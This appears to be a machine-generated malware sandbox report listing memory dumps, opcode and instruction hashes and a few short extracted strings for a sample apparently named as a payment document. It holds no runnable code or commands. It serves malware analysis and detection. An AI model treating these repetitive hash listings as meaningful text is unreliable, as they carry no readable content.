                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fed78417b6592b6bbf5f332b31323a38f721c3961f933d9f0b39635eaa91431a
                                  • Instruction ID: c07fcbb0da35254561625fe8403ebdd7794a21c3352ea9e8c2f20ec6d97f0b73
                                  • Opcode Fuzzy Hash: fed78417b6592b6bbf5f332b31323a38f721c3961f933d9f0b39635eaa91431a
                                  • Instruction Fuzzy Hash: 3AE0E574E04208EFCB84DFA8D941AADFBF5EB49310F10C0AA9818A3351D6359E51EF80
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fed78417b6592b6bbf5f332b31323a38f721c3961f933d9f0b39635eaa91431a
                                  • Instruction ID: 974506a977acaf1ce74190be2833dffdd64d8da04ae3b9ff7ddff735af395772
                                  • Opcode Fuzzy Hash: fed78417b6592b6bbf5f332b31323a38f721c3961f933d9f0b39635eaa91431a
                                  • Instruction Fuzzy Hash: 0AE0E574E44208EFCB94DFA8D941AACFBF5EB49300F20C0AA9859A3351D7359A51DF80
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9a0424e604ac01a1a9f506624862ab17622a3c1b4e09dab70d2c15dad707675e
                                  • Instruction ID: c35609a01b177b60235ef5f45c6c7393ee969f041d5df1cfd87762d180c72c47
                                  • Opcode Fuzzy Hash: 9a0424e604ac01a1a9f506624862ab17622a3c1b4e09dab70d2c15dad707675e
                                  • Instruction Fuzzy Hash: 3FE0E574E04208EFCB84DFA9D5416ACBBF4FB89204F10C0A9881893351D6759A01DF81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9a0424e604ac01a1a9f506624862ab17622a3c1b4e09dab70d2c15dad707675e
                                  • Instruction ID: dcec8bab8a252b3b79efcd5d3b7566e6eb36ba08c4466008045f40328e962a7d
                                  • Opcode Fuzzy Hash: 9a0424e604ac01a1a9f506624862ab17622a3c1b4e09dab70d2c15dad707675e
                                  • Instruction Fuzzy Hash: 75E0E574E05208EFCB84EFA9D5416ADBBF4EB49200F10C0A9980893341D675AA02DF80
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9a0424e604ac01a1a9f506624862ab17622a3c1b4e09dab70d2c15dad707675e
                                  • Instruction ID: d4ab8937ca94e06f025ad27602ed23b42c274bcffc90aa47e58b93528c001232
                                  • Opcode Fuzzy Hash: 9a0424e604ac01a1a9f506624862ab17622a3c1b4e09dab70d2c15dad707675e
                                  • Instruction Fuzzy Hash: 20E01A74E55208EFCB84DFA8D5416ADFBF4EB49304F10C1A9D81893341D635AE02DF81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c0e2b601da7909d67bdbf47d79c9cb6940c83d43bde11daa461d6941e29a219c
                                  • Instruction ID: 120ea7bf348732f9d8f7832df091dd01106b34a02a2c15fadfff22b5bd5b6c67
                                  • Opcode Fuzzy Hash: c0e2b601da7909d67bdbf47d79c9cb6940c83d43bde11daa461d6941e29a219c
                                  • Instruction Fuzzy Hash: 48E08C75D49219EFC744DFA8D951AADBBB8AB4A300F10C0ADD94857381CA329A42EF94
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1552db9dee9616f1e25e1c8538d87105a7b8ff3f4fc04ca8d2f6e377b0c72b02
                                  • Instruction ID: 78975ccec0ae94f2685bb512afea286ca7c3a02661560ebc6e4bfd47456b4f8f
                                  • Opcode Fuzzy Hash: 1552db9dee9616f1e25e1c8538d87105a7b8ff3f4fc04ca8d2f6e377b0c72b02
                                  • Instruction Fuzzy Hash: F1E04F34D4525CEFC754DF98D5416ACFBB8EB4A214F20C1E9C80953351CA355E41DF81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1552db9dee9616f1e25e1c8538d87105a7b8ff3f4fc04ca8d2f6e377b0c72b02
                                  • Instruction ID: c14bd295b5eb6089a5a796c386d765eadbb4c0c89324e8c9dfba3dd7b2f51f7a
                                  • Opcode Fuzzy Hash: 1552db9dee9616f1e25e1c8538d87105a7b8ff3f4fc04ca8d2f6e377b0c72b02
                                  • Instruction Fuzzy Hash: 58E01A34E04208AFC744DF98D5416ACBBB9AB49200F14C0A9881853341DA355A05EF80
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e06a167447c94fe818f2b8d7a707c3517964ca15e17a0bbe53a395f91a60568
                                  • Instruction ID: bd94878764a82dd096f8e9d33359f3190fa99a5452ec141d913b5cf9fdc93191
                                  • Opcode Fuzzy Hash: 3e06a167447c94fe818f2b8d7a707c3517964ca15e17a0bbe53a395f91a60568
                                  • Instruction Fuzzy Hash: A5E0C271801208EBC740EFF4D90478E77F9DB0A311F0044A6D30A97150EE718A00D7A5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1effcf203f0b2316d8bfca6d29a34bddee80329204eca0cc0280629d980ced4
                                  • Instruction ID: 42e7efa14031766963425261e303baa197f94d77a8235c2171229f84d800e1cd
                                  • Opcode Fuzzy Hash: a1effcf203f0b2316d8bfca6d29a34bddee80329204eca0cc0280629d980ced4
                                  • Instruction Fuzzy Hash: 46E01234D09209EBC748EF94D9515ACBBB8EF86304F20D199C80817355DB315E46DB95
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e52db94475119399ef21519bbd84599987ec802c5cb697616c3293f08ab60437
                                  • Instruction ID: 80dcc0dadbdcc40e560513a4227aad8f74fc04139db57e63a57ceccbca01a56d
                                  • Opcode Fuzzy Hash: e52db94475119399ef21519bbd84599987ec802c5cb697616c3293f08ab60437
                                  • Instruction Fuzzy Hash: E4F0AE79904228CFDB25DF24C9487DAB6B1BB4838AF1080EAA609A7384E7344E84CF51
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 002029a043b70a7646dfb563bdb0398e9a155382e393ff3c1992364e6625657d
                                  • Instruction ID: 434bb206c2b00617f79913afab1ba020453fe8f9adea95a5adba8942363fe020
                                  • Opcode Fuzzy Hash: 002029a043b70a7646dfb563bdb0398e9a155382e393ff3c1992364e6625657d
                                  • Instruction Fuzzy Hash: 9DD01273A4C232DEEF252A154C312ACB7B09F1E742B5909A4CC93F7181D775E81AD1B1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 153e2dfc54560785f7de478b6131e2541192fa07af5675fe7205a8c884c09573
                                  • Instruction ID: 5df12b10fba012be1d3825c4477c60cea445a78dabd7092d1e4a7b864ffb0b61
                                  • Opcode Fuzzy Hash: 153e2dfc54560785f7de478b6131e2541192fa07af5675fe7205a8c884c09573
                                  • Instruction Fuzzy Hash: 0EC08C3018520483D79437E4680E36873DC0B0A216F019000D30D42092CEB400A0C6BA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d63d8e4d4217a1edc8cf3b523b7971ca22220eb58ea27cab2ddd38bd75244aa
                                  • Instruction ID: cbb5f68915096ab238eed4b885f75ecb7b2d7dd1b552c92cc3d21dea2e371a98
                                  • Opcode Fuzzy Hash: 7d63d8e4d4217a1edc8cf3b523b7971ca22220eb58ea27cab2ddd38bd75244aa
                                  • Instruction Fuzzy Hash: E3900271045A0C8B4A402795780A556B75CA5495157980051F51D425119E6564104695
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'q$4'q
                                  • API String ID: 0-1467158625
                                  • Opcode ID: 0d699975f95dba013180b32e92c76cfac0a2f58c63dc29a832c86b77b299ce4b
                                  • Instruction ID: 4ede788e88f417ee2edfdc1e437ca08413ee8e7fa606d0ab60edc421a1dee7ea
                                  • Opcode Fuzzy Hash: 0d699975f95dba013180b32e92c76cfac0a2f58c63dc29a832c86b77b299ce4b
                                  • Instruction Fuzzy Hash: 96713170D00A088FDB49EF7AE85669DBBF3BBC9300F18C169D0049B269EF709945CB61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'q$4'q
                                  • API String ID: 0-1467158625
                                  • Opcode ID: 22312f5ae6fd662abd513e501bc62df90ca11fb505246d92f736d8a646f38e3e
                                  • Instruction ID: 47fed9535347e1c4b345685139351cf624b3cb9a58ffd45aa27917fcf0ce9423
                                  • Opcode Fuzzy Hash: 22312f5ae6fd662abd513e501bc62df90ca11fb505246d92f736d8a646f38e3e
                                  • Instruction Fuzzy Hash: B4710070E00A058FDB49EF6AE85669DBBF3BB89300F18C169D0049B269EF749945CB61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: [
                                  • API String ID: 0-784033777
                                  • Opcode ID: f359aea7defa861a9f27c878db6ec8c348513f8861d16d25f5bb726e19b9e6f1
                                  • Instruction ID: ac51fcd0487f2917dd3ad5737862ce1befb79570d5e656c01379d3b567da0c52
                                  • Opcode Fuzzy Hash: f359aea7defa861a9f27c878db6ec8c348513f8861d16d25f5bb726e19b9e6f1
                                  • Instruction Fuzzy Hash: 52413B71E056188FDB68CF2AC8086DAB7F7BF89300F04D0EAD509A7618DB744A85CF41
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6483f0685b19906e7a6ecea3776b7a6e007b1398b4cb3d0ee3040113b50455cd
                                  • Instruction ID: 241603377862e78cad75ea7664b0f5be51fe2bc48c33ca571c48953015c6f9b8
                                  • Opcode Fuzzy Hash: 6483f0685b19906e7a6ecea3776b7a6e007b1398b4cb3d0ee3040113b50455cd
                                  • Instruction Fuzzy Hash: 3D812771D45229CFEBA4DF69C8847EDBBB6BF4A300F5090A9C009A7251DBB49AC5CF41
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 253ae8414714cdd054711b4fbb5d0a744b9f89bd263937b55dddb7fdc11b6fc2
                                  • Instruction ID: 53864d0810c74cb14e12ffd267c203f58f5f58c1f6c38ee9482fb104ee10b22a
                                  • Opcode Fuzzy Hash: 253ae8414714cdd054711b4fbb5d0a744b9f89bd263937b55dddb7fdc11b6fc2
                                  • Instruction Fuzzy Hash: 02315071D097598FE71ACF2BCC1429ABBF7AF85300F08C0FAD448AA265DB740A818F51
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1c7c31508b20c5f78f5e1540dc504b962f871a14732994bce342ca677e0729a6
                                  • Instruction ID: ac193d82ab75f8945478c1baf2984df28119694e03090261a2f9b8a2015e48f3
                                  • Opcode Fuzzy Hash: 1c7c31508b20c5f78f5e1540dc504b962f871a14732994bce342ca677e0729a6
                                  • Instruction Fuzzy Hash: E931C9B1E056188BEB28CF5BC94479EFBF7AFC9304F14C0A9C40CA6264DB740A858F11
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 161a1836cb47eda85c2f2f602a51b5e371803936a3dac2b7caa96c1744efd699
                                  • Instruction ID: e4f055e22c2248fdc4e984af6e06940abc8b26facea5d738e1c1efbad6530bb2
                                  • Opcode Fuzzy Hash: 161a1836cb47eda85c2f2f602a51b5e371803936a3dac2b7caa96c1744efd699
                                  • Instruction Fuzzy Hash: 671126B1E006089BEB19CF6BC80029EFBF7AF89300F14C56AC918AB265EB740545CF90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !$(oq$+$\sq
                                  • API String ID: 0-2405194844
                                  • Opcode ID: d9eb85f508991a1ee0b24ca66a35dacb37f28c5a4cefb3ab5af8bd75e1a37e90
                                  • Instruction ID: 6766095dbafb89cf10b42fa5ffa0eecd5eb51175d1f0c3cf1e1b223611b367c8
                                  • Opcode Fuzzy Hash: d9eb85f508991a1ee0b24ca66a35dacb37f28c5a4cefb3ab5af8bd75e1a37e90
                                  • Instruction Fuzzy Hash: C2212831E04229DFDBA4DF65CC447EAB7B6BB89300F0081AAC519A7250DB705A85CF81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Teq$Teq
                                  • API String ID: 0-2938103587
                                  • Opcode ID: 299815d9bcbefc80a1b32ef4ffa6712f95e1a2c5f508eae71b0bddf632af3787
                                  • Instruction ID: 75cfc154234302ffc12d97eef7364d08a6cff70f19c884b70e6cdb364e7d5d66
                                  • Opcode Fuzzy Hash: 299815d9bcbefc80a1b32ef4ffa6712f95e1a2c5f508eae71b0bddf632af3787
                                  • Instruction Fuzzy Hash: 61410B74B11204CFCB48DFA8D598AAEBBF2BF8D310B2544A9E506AB361DB709C01CF50
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 48dd6eb36bda301906d8247b5a511729e60e66ed18a4e74b3d2a9b2805eaad21
                                  • Instruction ID: fe66054daa090ffd89a20a1154c4f433e470291035a9e78e8e1f382e1bd8a6ff
                                  • Opcode Fuzzy Hash: 48dd6eb36bda301906d8247b5a511729e60e66ed18a4e74b3d2a9b2805eaad21
                                  • Instruction Fuzzy Hash: 19D103346006848FDB16DF38C661A9ABFF6FF45310B188198D9429B366DF71ED46CB80
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 64a07ae3461bcabca576b4aac86caf29fa163077a5cec635cd316280ded3a4e5
                                  • Instruction ID: 853ee298f2d4af367812f27e91f6a043f9e419b130e8cb78a870d8b1c3b2742f
                                  • Opcode Fuzzy Hash: 64a07ae3461bcabca576b4aac86caf29fa163077a5cec635cd316280ded3a4e5
                                  • Instruction Fuzzy Hash: 40618E75600600CFCB14DF29D594A99BBF7BF88710B1581A9E906EB3A9DB71EC41CF90
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d3ecfb0eb3b4e60ff05cae811297d0f2f9ca02b7b0113f3dec1fbab2a37ae806
                                  • Instruction ID: fd97c3974e9d778542a706566966d671da80d083be8b009c8ff56ef589998e70
                                  • Opcode Fuzzy Hash: d3ecfb0eb3b4e60ff05cae811297d0f2f9ca02b7b0113f3dec1fbab2a37ae806
                                  • Instruction Fuzzy Hash: 3F21C035709204CFDB148B28D888B2A7BE5EF99304F1544A9E107DB3B2DAB1EC02CB21
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2554769701.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_bad000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 045dec811fcf6b9198b807366236b0d3085060ffd1e07398661957ddf92d83db
                                  • Instruction ID: 05a0700600972d9c935eec490f8f012976e039458a642824bb46c1268022a131
                                  • Opcode Fuzzy Hash: 045dec811fcf6b9198b807366236b0d3085060ffd1e07398661957ddf92d83db
                                  • Instruction Fuzzy Hash: 8B2125B1508340DFDB05DF10D9C0B26BBA5FB98314F20C5A9E80A0BB56C736E856CBA2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2554769701.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_bad000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ab5b5572e3011779fb6bf266da2c0bc67b9eecc7b6856e8edaff4a9e0567337
                                  • Instruction ID: 89807ce37b73e8d9548302236aba3784699327fc184dd5804cf99e22288a114e
                                  • Opcode Fuzzy Hash: 3ab5b5572e3011779fb6bf266da2c0bc67b9eecc7b6856e8edaff4a9e0567337
                                  • Instruction Fuzzy Hash: DB213A71908340DFDB15DF14D9C0B26BFA5FB99318F30C5A9D90A0B656C336D856CBA2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2554769701.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_bad000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1fb4414c9536cdd5ff7d631645d03b97c41db61db63814828e66148779de983
                                  • Instruction ID: 4dcaf7621b496d8b568045922ccdca164d2eb75d42a20cd3285624d779ee2793
                                  • Opcode Fuzzy Hash: c1fb4414c9536cdd5ff7d631645d03b97c41db61db63814828e66148779de983
                                  • Instruction Fuzzy Hash: FC11B1B6908240CFDB16CF14D5C4B16BFB2FB95324F24C5A9D90A0B656C336D856CBA2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2554769701.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_bad000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1fb4414c9536cdd5ff7d631645d03b97c41db61db63814828e66148779de983
                                  • Instruction ID: bc5e13b89d9f8e20e9482cf12b37640de7078f8f0d0b944bd2ee8a594fd7814c
                                  • Opcode Fuzzy Hash: c1fb4414c9536cdd5ff7d631645d03b97c41db61db63814828e66148779de983
                                  • Instruction Fuzzy Hash: 2911B176504280CFDB16CF10D5C4B16BFB1FB98314F24C5E9D84A0B656C336E856CBA1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5cb94de60d728154f4a5a83eafa4050a25644b34f9ec96e64f436a6b193902d1
                                  • Instruction ID: bf163f35e28daa21eef668fa4388e0eb3fbe71e3ee7809f3363de7e4d0a1c870
                                  • Opcode Fuzzy Hash: 5cb94de60d728154f4a5a83eafa4050a25644b34f9ec96e64f436a6b193902d1
                                  • Instruction Fuzzy Hash: 5F116078D0A104DFDB04DFA4D5883ADBBF5EB49309FA080E6D40B97355DBB88A86CB41
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e19c0768832296d8575e165cb940129cc5a02a7df913b757ec47cf3d7d0f0a7
                                  • Instruction ID: 1689c66361cf1a955bc4ea8e31d296ae45a3727651212cfe5f03aee1997723db
                                  • Opcode Fuzzy Hash: 9e19c0768832296d8575e165cb940129cc5a02a7df913b757ec47cf3d7d0f0a7
                                  • Instruction Fuzzy Hash: 94114675D0A104DFDB04DFA4D4893ADBBF5EB55309F6080E5D4079B355DBB44A86CB01
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f963eb1aa9b05d17638acf9eac80fe1b1b6ae767261b5d91d401cbbab9c8d3d
                                  • Instruction ID: 54ac5bfb6f994a306fbbdefa4aebe55bc783deb06b8ba5c4ef7c42ba2985bb29
                                  • Opcode Fuzzy Hash: 2f963eb1aa9b05d17638acf9eac80fe1b1b6ae767261b5d91d401cbbab9c8d3d
                                  • Instruction Fuzzy Hash: B1111B78D1A108DFDB04DFA5E5883ADBBF5EB58309FA080E5D40B97344DBB45A86CB41
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9bac10644283b6bb3619da0e9c4cb45a8f4f566a4aeb774c4056d4f9d816474e
                                  • Instruction ID: 7b49750a6d1166c683c22f605263c76eb9d090b0b7a4277e0264f9cbbc51a65e
                                  • Opcode Fuzzy Hash: 9bac10644283b6bb3619da0e9c4cb45a8f4f566a4aeb774c4056d4f9d816474e
                                  • Instruction Fuzzy Hash: 14F09E353092009FE71446689D44B6B37C6EBD9308F184179E20BD7352D9A19C06C360
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
